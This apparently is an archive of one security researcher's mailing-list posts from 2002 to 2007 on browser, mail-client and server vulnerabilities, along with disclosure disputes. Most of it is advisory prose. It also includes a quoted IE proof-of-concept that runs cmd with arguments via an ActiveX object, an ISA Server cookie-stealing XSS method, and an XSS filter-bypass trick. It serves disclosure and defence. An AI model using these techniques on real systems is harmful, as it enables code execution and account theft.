Re: Mozilla protocol abuse

2007-07-26 Thread Thor Larholm
Since I published this report it has come to my attention that 
Thunderbird 1.5, unlike Thunderbird 2.0, has not been patched with the 
osint security flag. As such all Thunderbird 1.5 users are vulnerable 
against this attack and those exploits. Now would be a good time to 
upgrade to Thunderbird 2.0.

Thor Larholm

Thor Larholm wrote:
The Mozilla application platform currently has an unpatched input 
validation flaw which allows you to specify arbitrary command line 
arguments to any registered URL protocol handler process. Jesper 
Johansson already detailed parts of this on his blog on July 20, I wrote a vulnerability 
report on July 18 together with a proof-of-concept exploit that 
targeted Thunderbird

Thunderbird was released on July 19 and incidentally fixed 
this specific attack vector through its osint command line flag. It 
is now 6 days later and people should have had time to update their 
Thunderbird installations, so I have decided to publish my 
vulnerability report together with the exploits as they detail how to 
handle XPI exploitation.

The HTML version can be found at

A ZIP file with the report and the XPI exploits can be found at

Thor Larholm

Mozilla protocol abuse

2007-07-25 Thread Thor Larholm
The Mozilla application platform currently has an unpatched input 
validation flaw which allows you to specify arbitrary command line 
arguments to any registered URL protocol handler process. Jesper 
Johansson already detailed parts of this on his blog on July 20, I wrote a vulnerability report 
on July 18 together with a proof-of-concept exploit that targeted 

Thunderbird was released on July 19 and incidentally fixed this 
specific attack vector through its osint command line flag. It is now 
6 days later and people should have had time to update their Thunderbird 
installations, so I have decided to publish my vulnerability report 
together with the exploits as they detail how to handle XPI exploitation.

The HTML version can be found at

A ZIP file with the report and the XPI exploits can be found at 

Thor Larholm

Internet Explorer 0day exploit

2007-07-10 Thread Thor Larholm
There is a URL protocol handler command injection vulnerability in 
Internet Explorer for Windows that allows you to execute shell commands 
with arbitrary arguments. This vulnerability can be triggered without 
user interaction simply by visiting a webpage.

When Internet Explorer encounters a reference to content inside a 
registered URL protocol handler scheme it calls ShellExecute with the 
EXE image path and passes the entire request URI without any input 
validation. For the sake of demonstration I have constructed an exploit 
that bounces through Firefox via the FirefoxURL protocol handler. The 
full advisory and a working Proof of Concept exploit can be found at

Thor Larholm

Safari for Windows, 0day URL protocol handler command injection

2007-06-12 Thread Thor Larholm
Apple released version 3 of their popular Safari web browser today, with 
the added twist of offering both an OS X and a Windows version. Given 
that Apple has had a lousy track record with security on OS X, in 
addition to a hostile attitude towards security researchers, a lot of 
people are expecting to see quite a number of vulnerabilities targeted 
towards this new Windows browser.

There is a URL protocol handler command injection vulnerability in 
Safari for Windows that allows you to execute shell commands with 
arbitrary arguments. This vulnerability can be triggered without user 
interaction simply by visiting a webpage. The full advisory and a 
working Proof of Concept exploit can be found at

Thor Larholm

I call dibs on the first SafariWin bug

PHPMailer command execution

2007-06-11 Thread Thor Larholm
PHPMailer is a widely deployed utility class used in PHP application to 
handle emails sent through sendmail, PHP mailto() or SMTP. It is used in 
PHP applications such as WordPress, Mantis, WebCalendar, Group-Office 
and Joomla. The last official release happened on July 11, 2005.

If you have configured PHPMailer to use sendmail it has a remote command 
execution vulnerability due to a lack of input validation. sendmail is 
queried through the popen function which is called with a string 
constructed from non-escaped user input.

Thor Larholm

Unpatched input validation flaw in Firefox

2007-06-04 Thread Thor Larholm

Firefox contains a fix for a directory traversal vulnerability
that allowed you to read local files through the resource protocol.

However, the patch only partially fixed the vulnerability on Windows
systems and accidentally circumvents an existing input validation

The net result is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.


Thor Larholm

Re: Firefox extensions go Evil - Critical Vulnerabilities in Firefox/Firebug

2007-04-06 Thread Thor Larholm

I have identified a second critical 0day vulnerability in Firebug
which also affects the updated Firebug v1.0.3. The scope is the same,
read/write/execute files.

There's a detailed walkthrough at the above, including a simplistic
POC that verifies whether script was injected into the browser Chrome.

From there any practical exploit would be similar to all of the older

Firefox browser Chrome exploits.

Joe Hewitt has already responded to the above and my previous post
stating that an updated version of Firebug (1.0.4) should be released
now. Updates are available and should trickle out to Firebug users
through Mozilla's automated update system within the next few days. If
you can't wait for that then go to Tools, Add-ons and click Find

The updated version of Firebug should also prevent any closely related
vulnerabilities as Joe has updated his domplate constructors to
forcefully escape all strings before they are inserted into the
console HTML.

Thor Larholm

On 4/4/07, pdp (architect) [EMAIL PROTECTED] wrote:

There is critical vulnerability in Firefox/Firebug which allows
attackers to inject code inside the browser chrome. This can lead to a
lot of problems. Theoretically everything is possible, from modifying
the user file system to launching processes, installing ROOTKITs, you
name it.

I recommend to disable Firebug for now until the issue is fixed. The
issues is a bit critical since Firebug is one of the most popular
extensions for Firefox. Given the fact that a lot of the Firefox users
are geeks, the chances to have Firebug installed in a random Firefox
client are quite high.

I wrote two POC to demonstrate the issue. You can find them from the
page on the top of this message. The first POC runs calc.exe and
cmd.exe on windows systems. The second POC does a count down from 10
to 0 and executes calc.exe to prove that automatic execution is

pdp (architect) | petko d. petkov

Re: Browser bugs hit IE, Firefox today (SANS)

2006-07-04 Thread Thor Larholm

Alex Potter wrote: - update says 

After doing more research on this vulnerability and with great help from our 
readers (thanks to Dan and another reader) it seems that Mozilla Firefox is 
not affected by this vulnerability.

Firefox might not be directly affected by this vulnerability, but it 
does remind me of inconsistencies in how the security context of an 
object is handled inside Firefox.

Ordinarily, when you have a window object containing a document from a 
thirdparty domain, such as iframe id=thirdparty 
src=;/iframe, you are not allowed to reference any 
kind of objects inside this window. Using a DOM 0 approach, 
window.frames[0].contentDocument will give you a security exception. 
However, reading the contentDocument property of the DOM element instead 
of the through the frames collection will give you a reference to the 
document object inside the thirdparty domain and even allow you to 
overwrite native DOM methods without throwing a security exception, such 
This also holds true for window.frames[0].document.getElementsByTagName 
and any other methods on the document object.

Functionally, the document and contentDocument properties both reference 
the same object and should obey the same security context rules, however 
Firefox differentiates based on how you reference that object and thus 
allows you to overwrite native DOM methods on a thirdparty domain, 
broadening the potential attack scope by allowing you to interfere with 
the operations of existing script code inside that thirdparty document.

Thor Larholm
PolyPath, CSO

RE: Notepad popups in Internet Explorer and Outlook

2003-08-14 Thread Thor Larholm
The problem at hand is not one of Notepad or the view-source protocol,
but of the behavior inherant to Internet Explorer on how to handle
certain mimetypes and protocols. Your advisory (good as it is)
highlights an example of the problem, but disregards the larger picture.

Whether or not a specific mimetype or protocol will be automatically
opened by the MSHTML renderer is controlled by the EditFlag registry
key. Changing bit 0 of byte 2 controls whether the Open/Save dialog box
appears or if the content is automatically opened.

You could e.g. use this to disable the automatic opening of MIDI files,
which would be a very quick way for most domain administrators to
efficiently disable the MIDI exploit from last week.

You can read more about EditFlag at
Flags.htm or

As such, this problem is not limited to plaintext messages, but extends
to other types of data and other protocols.

It's funny that you have looked into this now, I am currently writing up
some stuff about inline embedding and automatic execution of media data
and exe files in emails (MHTML/EML) which covers the broader picture. I
guess the cat is out of the bag now, might as well release that soon ;)

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED] 
Sent: Monday, August 04, 2003 11:58 AM
Subject: Notepad popups in Internet Explorer and Outlook


Do Notepad popups represent a security risk or are they simply another
way for spammers and marketers to annoy us? Because of a design flaw in
Internet Explorer, Notepad popup windows can be displayed from an HTML
email message or Web page regardless of browser security settings. In
addition, Notepad popups can access files on a hard disk, possibilly
causing stability problems in a Windows saystem. 

For more details, see:

Question:  What kind of operating system allows an email message to
automatically start up a text editor to change a system file?

Richard M. Smith

RE: RPC DCOM still vulnerable even after applying patches

2003-07-29 Thread Thor Larholm
Positively confirmed on patched Windows 2000 SP4 - did not reproduce on
patched XP Home.

Drag/Drop and other COM functions stop working, after a very visible
svchost.exe crash.

The hdmore loopback exploit is more friendly - it gave a nice DoS on all
RPC/COM services (no drag/drop) without crashing svchost. Of course,
this is only with the new return addresses that are not tied to any
specific servicepack..

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
From: khan rohail [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 28, 2003 8:34 AM
Subject: RPC DCOM still vulnerable even after applying patches

This is in reference to exploit code available here:

We (Douglas Mclean/and I) have checked it against
windows 200 SP4 machines that even if you apply the
patch kb823980, you can get DOS attacks as tcp port
135 service (loc-srv)gets crashed and we get this
error on the box against which the exploit is being

SVCHOST.exe has generated errors and will be closed
by Windows. You will need to restart the program. An
error log is being created.

You are not able to access Event log either and other
funny things are detected too.

So, even if you apply the patch MS03-026 you still are vulnerable and
you can still get DOS attacks.

Shoaib Qazi/Douglas McClean

RE: Drivial Pursuit: Internet Explorer Browser Your Files and Folders !

2003-07-24 Thread Thor Larholm
I can positively confirm this vulnerability on both WMP 7 and 8 on Windows
98, ME, 2000, XP and 2003. The default Enhanced Security Configuration of IE
on Windows 2003 does nothing to prevent automatically opening certain media

The ASF file can be automatically opened through an IFRAME, both on a
webpage and in an email - even with scripting disabled in the Restricted
Zone, which has so far been a major mitigating factor. This means that an
emailborne exploit would execute immediately when a user opened or previewed
an HTML-based email.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
Subject: Drivial Pursuit: Internet Explorer Browser  Your Files and
Folders !

Wednesday, 23 July, 2003

Yet another quaint lead-up to silent delivery and installation of an
executable on a target computer. No client input other than viewing a
web page !

This is getting boring.

A myriad of technical hurdles have been recently placed to disallow
access to files and folders on the local machine from the internet.
Previously simple redirects could defeat that, but that too has been

Coupled with a myriad of existing possibilities of placing arbitrary
files in known locations on the local machine, along with perhaps
several other well known applications that create sensitive files in
known locations on the local machine, accessing all of these with our
trusty browser commonly known as IE, leaves us with ample opportunity
to wreak further havoc on the unsuspecting customers of the
manufacturer, one Microsoft.

For an ever increasing list of component possibilities seek here:

Once again the problem lies within our trusty and battle-hardened
Windows Media Player. Two second creation of Zero second URL flip to
local machine, allows us the desired access.  Whether this is the
result of a 'trusted' media file or not is unclear. Not important.
Custom crafted media files seem to fail.

Working Example:

Fails on WMP 9 but fully functional on all others regardless of
operating system:

ATTENTION: demo is merely first step. Plug 'n Play any of the
available components in the listing above for maximum results:!.html


1. We appear to be going around and around in circles now
2. We see no possibility of ever expending one red cent to this
particular toy manufacturer. As such we are stuck with what we have.
We would be interested to thoroughly examining the latest and
greatest toys created by these people and should someone feel like
lending us a couple shiny new machines with default installs of the
latest and greatest toys, we'll be happy come to some sort of mutualy
beneficial arrangement.
3. None.


Microsoft ISA Server HTTP error handler XSS (TL#007)

2003-07-16 Thread Thor Larholm
Thor Larholm security advisory TL#006

16 July 2003

HTML format:

Topic: ISA Server HTTP error handler XSS.

Discovery date: 25 June 2002.

Severity: Medium

Affected applications:

Any Microsoft Internet Security and Acceleration (ISA) Server installation
that hosts the default HTTP error pages. This includes:

ISA Server 2000


Stealing cookies from any ISA-protected site, cross-site scripting to any
ISA-protected site, hijacking Hotmail and Passport accounts, elevating
priveleges through ActiveX components, hijacking the MSN Messenger client,


CrossSiteScripting is a term that describes the injection of script code on
foreign sites. A very likely scenario is where a malicious programmer would
inject code on e.g. to steal a victims cookies, allowing him/her
to hijack the victims email account.
The default installation of ISA Server is suspectible to such a XSS error.


Every time ISA Server encounters a HTTP errorcode such as 404 Not Found or
500 Internal Server Error, ISA Server returns a HTTP error handler document
which is an HTML file.
These HTML files use scripting to output a link to the SERVER.TLD part of
the URL, and by crafting a specially formed URL it is possible to include
arbitrary script commands on the HTTP error handler document, thereby
enabling CrossSiteScripting on any ISA-protected site.

Unlike TL001 we will prefer to trigger a 500 Internal Server error instead
of a 404 Not Found error, as the HTTP 500 error handler document can easily
be lured out of ISA Server by appending %U0 to the querystring, resulting in
an unparsable request.
Many other requests can result in ISA Server handing out an HTTP error
handler document.

If we look at 404.htm or 500.htm we will notice a particular line of code:

document.write( 'A HREF=' + escape(urlresult) + '' + displayresult +

displayResult is derived from the first instance of :// in the URL until the
next instance of /.
This means that we will have to include our script code before the path part
of the URL. To accomplish this we include our script code in the Basic
Authentication part of the URL, but we first have to escape any special
characters in the code. Any / character will end displayresult prematurely
and any spaces will corrupt the DNS lookup, and we therefor replace any
space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically
reference an external file).



The above will include and execute on YOUR.TLD,
provided that YOUR.TLD is protected by an ISA Server installation.


Apply the MS03-028 patch.
You could also use the opportunity to make yourself some nice custom error
handler documents.


25 June 2003: Discovery
27 June 2003: Notification to MS with complete advisory
28 June 2003: Reply from MS:

This has actually been reported to us by another finder a few weeks ago.
We're nearing a release of a bulletin crediting the finder and a patch.

16 July 2003: MS03-028 patch released by MS, no credit for discovery
16 July 2003: Public advisory


I have put together some proof-of-concept examples:

Simple static examples - your cookies from a selection of domains:

Short advanced example - get the cookies from any ISA-protected site:


MS03-028 patch
TL001 IIS allows universal CrossSite Scripting:
CERT Cross Site Scripting advisory:
Unpatched IE vulnerabilities:

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

Re: .MHT Buffer Overflow in Internet Explorer

2003-03-12 Thread Thor Larholm
 From: jelmer [EMAIL PROTECTED]
 I believe from ie6 SP1 on IE doesn't open any mht files directly from the
 web anymore.
 from the local filesystem it still works though.

That's the funny thing, IE6 SP1 still allows opening MHT files directly from
the web in the Internet Zone, so this is remotely exploitable on websites.

Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

Re: O UT LO OK E XPRE SS 6 .00 : broken

2003-02-24 Thread Thor Larholm
Outlook Express is not the only vulnerable product.

The culprit here is the codebase localPath vulnerability which was patched
in Internet Explorer by MS02-015 in March 2002. GreyMagic had more fun with
this at which is also the origin
of the example displayed.

MS02-015 crippled codeBase quite severely in Internet Explorer, completely
removing most of its functionality in the Internet Zone. It is still
possible to use this vulnerability in Internet Explorer in any local
security zone, but getting to that zone in the first place is in itself an

Whatever Microsoft patched in MS02-015 (crippling codeBase in the Internet
Zone to avoid the command execution vulnerability) was only applied to the
IE-specific parts of MSHTML and not to any shared parts that thirdparty
programs such as Outlook and Outlook Express utilize. This despite our
impression that MS02-015 removed the problem.

This is apparent if you examine Outlook 2000 which can also execute
arbitrary commands automatically upon reading mails if you have set the
security zone to the Internet Zone - just like Outlook Express as displayed
by http-equiv

The default security zone for Outlook 2000 is the Internet Zone. It is first
after you apply Office 2000 Service Pack 3 that the default zone is changed
to the Restricted zone, so remember either to apply O2KSP3 or manually
change your zone settings to Restricted at your earliest convenience.

Does Eudora still use the Internet Zone for viewing HTML mail? If so, it is
also still vulnerable to the codeBase command execution vulnerability, like
any other application that is embedding MSHTML.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

Latest PivX research: Multi-Vendor Unreal Engine Advisory

- Original Message -
Sent: Saturday, February 22, 2003 4:36 PM
Subject: O UT LO OK E XPRE SS 6 .00 : broken

 Saturday, February 22, 2003

 Technical silent delivery and installation of an executable no client
 input other than reading an email or viewing a newsgroup message.
 Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.

Rest of original http-equiv post at

The rest was snipped to avoid barking from premenstrual antivirus scanners.

Epic Games threatens to sue security researchers

2003-02-11 Thread Thor Larholm
On February 5th, Luigi Auriemma of PivX Solutions released a tightly packed
advisory detailing multiple vulnerabilities in the Unreal network gaming
engine developed by Epic Games. These vulnerabilities affect both clients
and servers who are playing the plethora of games that are using the engine,
and has been readily exploitable for 5 years.

The press release:

The advisory itself:

Following both industry and personal standards, PivX gave Epic Games a
duration of 30 days to (at the very least) respond to our private
notification to them. After nothing had happened during that month we
prepared to release the advisory, yet once the press asked Epic Games for
comments they were suddenly very responsive. Promises to work closely with
us on the vulnerability and advisory were made and we managed to hold down
the press for several months after this. 60 days passed after this, without
any collaberation, honest effort or actual contact from Epic Games.

We released the advisory after 90 days had passed from the original vendor
notification. 90 days, in which we were played like fools, in which Epic
Games had ample time and sufficient opportunity to react and work with us on
a coordinated release. 90 days in which Epic Games, from the best of our
comprehension, had archived our communications in the thrash, during which
we received no serious communication except for crisis handling at the
originally planned release time.

On February 6th, BluesNews (among many others) could cite a quote from Mark
Rein, Epic Games Vice President:

I won't sugar coat this. We f***ed up on this. Yes this is real and yes
this was brought to our attention and yes we should have fixed it by now.

On February 11th the tides have changed, and TechTV are reporting public
legal threats from that same person:

This is slanderous, he says. They've taken this too far. We're getting
our lawyers involved with this.,24195,3417248,00.html

I fail to see how Mark Rein on one hand can publicly announce this to be a
real threat that they should have fixed earlier, and on the other hand can
announce the advisory to be false and malicious statements. There is no
slander or libel in any aspect of this, and the only imaginable outcome that
Mark Rein must have been aiming for by his declaration of layer involvement
is to silence future security research on Epic Games products through the
promise of unfounded barratry. As we know from precedents in the past, this
approach to security is counterproductive at best and encouraging for
underground security research at worst, and I can only hope for an official
retraction of this policy by Epic Games once other employees have had half a
minute to think about the implications and example that Mark Rein is setting

In the past, I have received better nonresponsive treatment by Microsoft
when their security handling was at its worst. Contrary to the vast
improvements that Microsoft has gone through over the last year and a half,
Epic Games did not even start to acknowledge the problem properly before a
full public disclosure had been made on February 5th.

I believe that Luigi, and all of PivX, has handled this issue in a
courteous, proffessional and ethical manner, and the uncoordinated release
that was its outcome stems from a direct result of a nonresponsive vendor
that at best is plainly ignorant and at worst acts directly against the best
interest and security of its own customers.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

Latest PivX research: Multi-Vendor Unreal Engine Advisory

Notes on MS02-068, extensive downplaying of severity

2002-12-05 Thread Thor Larholm
Following the release of the cumulative MS02-066 patch from the previous
week, Microsoft has released yet another cumulative patch for Internet
Explorer - MS02-068, which can be found at

The sole vulnerability that MS02-068 patches is the external object
caching vulnerability discovered by GreyMagic Software. The rater
surprising aspects of this bulletin is the extensive downplaying of severity
and the incorrect mitigating factors.

Microsoft has given this vulnerability a maximum severity rating of
Moderate. Great, so arbitrary command execution, local file reading and
complete system compromise is now only moderately severe, according to

Moving on to the technical description, we see yet more inaccuracies. The
entire first paragraph is a falsum:

Exploiting the vulnerability could enable an attacker to read, but not
change, any file on the user's local computer. In addition, the attacker
could invoke an executable that was already present on the local system. The
attacker would need to know the exact location of the executable, and would
not be able to pass parameters to it. Microsoft is not aware of any
executable that ships by default as part of Windows and, when run without
parameters, could be dangerous. 

Allow me to rephrase:
Exploiting the vulnerability could enable an attacker to perform any action
on the local computer that the user being exploited can perform. This
includes, but is not limited to, reading and changing any file on the user's
local computer, forcefully placing arbitrary files on the system in any
location and invoking any executable on the system both with and without

Further down we find yet more inaccuracies:
Without the ability to pass parameters, it's unlikely that an attacker
could do much. For instance, although the attacker could run the command
prompt, he couldn't pass a command (e.g., format c:) to it. 
This vulnerability provides no way for an attacker to transfer a program of
their choice to the user's system. 

Since we can already create and execute arbitrary command scripts on the
machine, I fail to see how the above can be remotely accurate. Accomplishing
this is as simple as creating and executing an automated FTP script, or
merely recreating an EXE file from an embedded string in the HTML.

Microsoft are very much aware of this, and even modified the MS02-066
bulletin (following the post from GreyMagic on Bugtraq) to provide
assistance in mitigating how the HTML Help control can execute commands in
the local zone.

It seems like Microsoft are deliberately downplaying the severity of their
vulnerabilities in an attempt to gain less bad press. It sure would look bad
to release 2 critical cumulative updates in just 2 weeks, but that is
exactly what has been done. As it stands now, the bulletin is released and
most journalists willing to comment have already noticed the Moderate
label and the extensive list of (incorrect) mitigating factors, and quite
likely will not write anything on just how severe this really is. I doubt
most people care to read the revisions to the bulletin that will come later.

There are currently 18 unpatched publicly known vulnerabilities in Internet
Explorer, of which I have labelled 6 as severe.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Strike Now, StrikeFirst!

RE: ZDnet forum: IE formatting local drive

2002-11-16 Thread Thor Larholm
This is just a copy of Andreas Sandblads advisory, with a new command :)

Thor Larholm, Security Researcher
PivX Solutions, LLC

Strike Now, StrikeFirst!

-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
Subject: ZDnet forum: IE formatting local drive

Format a local drive by visiting a URL from a fully patched Windows / IE
platform.  This appeared last night:

RE: Opera 7 vulnerabilities

2002-11-15 Thread Thor Larholm
Monitoring which pages a user visits is also possible, and in general there
seems to be some oversights in this otherwise smooth rewrite.

Add to that some of the more odd bugs functionalitywise, and I would say
there is room for a beta 2 ;)

Thor Larholm, Security Researcher
PivX Solutions, LLC

Strike Now, StrikeFirst!

-Original Message-
From: GreyMagic Software [mailto:security;]
Sent: 14. november 2002 17:43
To: Bugtraq
Subject: Opera 7 vulnerabilities

We've done some basic security tests, in cooperation with Tom Gilder, on the
new Opera 7 beta release and found two major security vulnerabilities. These
vulnerabilities are quite obvious and likely to be discovered by malicious

Combined, they allow full read access to a victim's file system (including
both directories and files) and scripting access to any domain.

Full details will be released once Opera resolves these issues. In the
meanwhile, users are encouraged not to upgrade to Opera 7 or disable

RE: How to execute programs with parameters in IE - Sandblad advisory #10

2002-11-07 Thread Thor Larholm
Unless I am missing something, this is definitely not a vulnerability in
itself but just a practical demonstration of the assign method caching

Executing programs with or without parameters also become pointless once you
have complete access to a local security zone (in this case, given by the
assign method caching vuln), as demonstrated by http-equiv quite some
times. Circumventing the zone barriers allow you to (among others) retrieve
the location of that funny malware you just planted in the users temporary
internet files, and subsequently execute it.

The HTMLHelp Control used in this example only has the authority to execute
commands at all because it is being used from a local security zone. As
such, when Microsoft are claiming that the technique used to run programs
with parameters from the Local computer zone was no security
vulnerability, they are in my opinion correct.
Despite this, it is always interesting to have more approaches to program
execution for demonstratory purposes once you get your foot inside the door
of a local security zone, especially since the codebase localpath approach
is practically filtered anywhere in its pure form.

IE6 SP1 did include some early attempts at preventing any interaction
between security zones (specifically from the Internet zone to any local
zone). That attempt was broken with the object redirect approach. It will be
interesting to see what Microsoft comes up with next to prevent interaction
between security zones.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

-Original Message-
From: Andreas Sandblad [mailto:sandblad;]
Sent: 6. november 2002 20:48
Subject: How to execute programs with parameters in IE - Sandblad
advisory #10
--- CUT HERE ---
// How to execute programs with parameters in IE, 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [EMAIL PROTECTED]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10)  '+
   'echo Sandblad #10  c:/vulnerable.txt  winmine';

if (!location.hash) {
else if (location.hash == #1)
else {
  f = opener.location.assign;
function run() {
  f(javascript:document.write('object id=c1 classid=clsid:adb+
   880a6-d8ff-11cf-9377-00aa003b7a11param name=Command value+
   =ShortCutparam name=Item1 value=\,+prog+,+args+\/+
   objectobject id=c2 classid=clsid:adb880a6-d8ff-11cf-9377+
   -00aa003b7a11param name=Command value=Close/object'));
--- CUT HERE ---

RE: Vulnerable cached objects in IE (9 advisories in 1)

2002-10-23 Thread Thor Larholm
 From: jelmer [mailto:jkuperus;]
 The external method flaw also seems to affects my ie6 sp1 browser

I can confirm this as well, together with the clipboardData method flaw.

It's a surprise that Microsoft didn't fix this globally in SP1, instead of
applying checks to each individual method and object. At first, I assumed
they had made a generic fix, but with this in the open it is clear that they
only patched specifics and that there will be many more vulnerabilities in
the method/object caching category.

Thor Larholm

RE: Who Need Friends ? IE MSN expose contact list other info

2002-10-16 Thread Thor Larholm

This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.

All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

-Original Message-
Sent: 15. oktober 2002 15:05
Subject: Who Need Friends ? IE  MSN expose contact list  other info

RE: XSS bug in hotmail login page

2002-10-08 Thread Thor Larholm

 From: Russell Harding [mailto:[EMAIL PROTECTED]]
 Is there another way to exploit this which I am not 
 seeing? Or does MSN actually have their act together
  (in this particular case...)?
 P.S. Well, I suppose the real question may be this:
 Is there a way to concatenate javascript strings without + or %2B?

Sure there is, the first that springs to mind is to use the replace method
which all strings have:

var myString = hi $.replace('$','monkeyboy');
alert( myString ); // alerts hi monkeyboy

The first argument can be both a string or a regular expression.;sc

Thor Larholm
Jubii A/S - Internet Programmer

RE: MSIE:SaveRef turns Zone off

2002-10-02 Thread Thor Larholm

This also works in IE5.5 as well.

Besides reading cookies from arbitrary sites, this vulnerability also allows
local file reading and execution - when combined with the OBJECT
crossprotocol redirection vulnerability.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

Mozilla vulnerabilities, an update

2002-09-18 Thread Thor Larholm

On September 9th I wrote the following to [EMAIL PROTECTED]

-- START --
I noticed that you have published a list ( ) of
security issues that have been fixed in Mozilla 1.0.1

I would recommend posting this list to the Bugtraq mailinglist,
[EMAIL PROTECTED], so that the secinfo industry and the public in
general becomes aware of these. This would help raise the awareness of your
security efforts, as well as urge users of older versions to upgrade and
provide hints to other software products that embed Gecko, or other parts of
Mozilla, that they should consider getting fresh sources for their projects.

In case you feel that this is not a necessary action, I would like to
personally make the list aware of these security fixes in a matter of 5
working days.
--   END   --

At first I received a reply from Asa Dotzler, which among others mentioned
that the list was far from comprehensive and

It would be much better if someone (mitch) updated the real page at;

So I forwarded and wrote to Mitch:

May I recommend updating the official list of known vulnerabilities in
Mozilla to include the vulnerabilities that have been fixed, such as XMLHTTP
and the many on Asas list?

And received a short reply last thursday:

Yes, that page will be updated soon. Thanks for letting me know.

Since nothing has happened, I thought I would pass this on to the list. This
is a short list of issues fixed between the 1.0 and 1.0.1 version of
Mozilla. As Asa mentioned, this list was just put together from some queries
on Bugzilla. Undoubtedly, there will be many more vulnerabilities that have
been fixed, and it would be a welcome change to let the public know about

BUG ID Product Component Summary
88183 Browser  Plug-ins  navigator.plugins leaks path names
104472 Browser  Security  execution of scripts in the file: protocol from
XUL using cgi
125583 Browser  Security  Disable automatic XLinks in Mail
135267 Browser  Security  Reading files cross-host using styles
144228 MailNews  Security  Malicious email breaks POP server connection
146094 Browser  Networking  Stealing third-party cookies through a proxy
147754 Browser  Security  XMLSerializer needs same-origin check
148256 Browser  XML  flawfinder warnings in XML Extras
148269 NSS  Libraries  flawfinder warnings in mozilla/security
148520 Browser  Password Manager window.prompt is returning a saved password
instead of prompting.
149777 Browser  Security  Node cloned from external, untrusted document and
appended to chrome document.
149943 Browser  Security  Princeton-like exploit may be possible
150339 Browser  Internationalization huge font crashes X Windows
151933 Browser  XML  xml:base should not allow setting chrome URLs
152697 Browser  Networking  no limit on the size of a HTTP header
152725 Browser  Cookies  Possible cookie stealing using javascript: URLs
154030 Browser  Security  HTML directory indexer doesn't html-escape url
154240 PSM  Client Libraries  No warning when redirecting https-http-https
at http protocol level
154930 Browser  Security  document.domain abused to access hosts behind
155222 Browser  Security  Heap corruption in PNG library
157202 Browser  Security  Exploitable (?) heap overrun in PNG
157652 Browser  JavaScript Engine  Crash, possible heap corruption in JS
157845 Browser  DOM Events  Crash involving
157989 Browser  ImageLib  Possible heap corruption with 0-width GIF
161721 Browser  Installer  install in onkeypress for space key bypasses
warning dialog

To put it shortly, I do appreciate the efforts put forth by the
team, I just wish they could be more communicative instead of hiding the
fact that Mozilla, like most any other software product, has had and will
have a long number of security vulnerabilities. Undoubtedly, this gives a
different view on the security of Mozilla than one would get by reading the
official list of vulnerabilities (listing just 1 vulnerability). Again, the
above was just an incomplete list of security issues that were fixed between
the minor version change 1.0 to 1.0.1, I have no idea about the amount of
issues that remain or that has been fixed so far.

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

RE: (Fwd) MSIEv6 % encoding causes a problem again

2002-09-05 Thread Thor Larholm

 From: Nick FitzGerald [mailto:[EMAIL PROTECTED]]
 Hi Thor,
 Doesn't the following have similar implications to the issue in your 
 TL#002 advisory??

Hi Nick,

close but no cigar - yet. In its current state, this % encoding issue cannot
escape protocol boundaries, which means that it cannot go from the Internet
Zone to the My Computer Zone and execute commands or read local files.

It can, however, do arbitrary cross domain scripting on any site in its
current protocol, which means that you can steal cookies and read/change
arbitrary content from foreign sites. If you e.g. have an HTTPS site
yourself, you can read/change the content for any other HTTPS site dispalyed
to the user - change the login form actions, read the users bank accounts,

The issue is not so much with escaped versions of / or \, but with escaping
of characters in itself. When actually retrieving the content, IE looks at
the escaped version of your URI and fetches your malicious code from (escaping the part makes it part of Basic
Authentication). When it later needs to check cross domain security settings
and see whether the 2 windows may communicate, it looks at the unescaped
version of your URI - which by now is a reference to instead of, with the Basich Authentication being part of the filename.


RE: XWT Foundation Advisory

2002-07-30 Thread Thor Larholm

 From: Microsoft Security Response Center [mailto:[EMAIL PROTECTED]]
snip mitigating factors

I for one am in agreement on this issue, especially with regards to
Default sites on e.g. IIS - it is very uncommon for anyone to serve
content from the Default site (without checking the Host header) these

That's not to say that sites like does not do this as
it seems to operate on the Default site, neglecting the most important
mitigating factor.

I still quite fail to see the relevance to firewalls, as nothing is
circumvented - the administrator has explicitly allowed HTTP traffic on
(most often) port 80.

Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team
fixed it by demanding both sites to set document.domain, regardless if one
is the parent?

Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?

RE: warning

2002-07-30 Thread Thor Larholm

If your vulnerability deals with the Office Web Components then no warning
should be necessary at this point, since Microsoft already yanked the OWC
downloads (both OWC 9 and 10) from their download pages back in April when
GreyMagic Software uncovered several vulnerabilities in them.

From their download page ( ):
Microsoft has temporarily removed the Office Web Components while we
conduct an investigation of potential security vulnerabilities.  At the
completion of our investigation, the OWC will be reposted. Thank you for
your patience.

Appareantly, researching these vulnerabilities must be very hard on MS
(despite their simplicity) since this has been so for a quarter of a year by
now. The vulns that triggered this action:

And again, these are still unpatched together with the total of 21 publicly
known unpatched vulnerabilities currently found in IE:

Of course, if you have installed Office by itself then you probably already
have OWC installed. Luckily this can be uninstalled separately by going to

ControlPanel -  Add/Remove programs - Office - Change - Office Tools -
Office Web Components.

If a system administrator installed OWC from a network share, then OWC will
be silently re-installed when used again - in which case you are out of

